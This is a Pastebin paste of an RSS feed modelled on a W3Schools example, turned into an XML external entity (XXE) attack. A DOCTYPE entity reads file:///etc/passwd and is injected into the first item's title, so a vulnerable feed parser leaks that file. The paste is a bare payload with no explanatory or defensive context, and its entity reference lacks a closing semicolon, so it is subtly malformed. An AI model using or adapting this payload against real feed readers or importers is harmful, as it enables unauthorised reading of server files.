Advertisement
Guest User

bla.rss

a guest
Oct 22nd, 2019
140
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE foo [
  3. <!ENTITY xxe SYSTEM "file:///etc/passwd" >
  4. ]>
  5.  
  6. <rss version="2.0">
  7.  
  8. <channel>
  9. <title>W3Schools Home Page</title>
  10. <link>https://www.w3schools.com</link>
  11. <description>Free web building tutorials</description>
  12. <item>
  13. <title>&xxe</title>
  14. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  15. <description>New RSS tutorial on W3Schools</description>
  16. </item>
  17. <item>
  18. <title>XML Tutorial</title>
  19. <link>https://www.w3schools.com/xml</link>
  20. <description>New XML tutorial on W3Schools</description>
  21. </item>
  22. </channel>
  23.  
  24. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement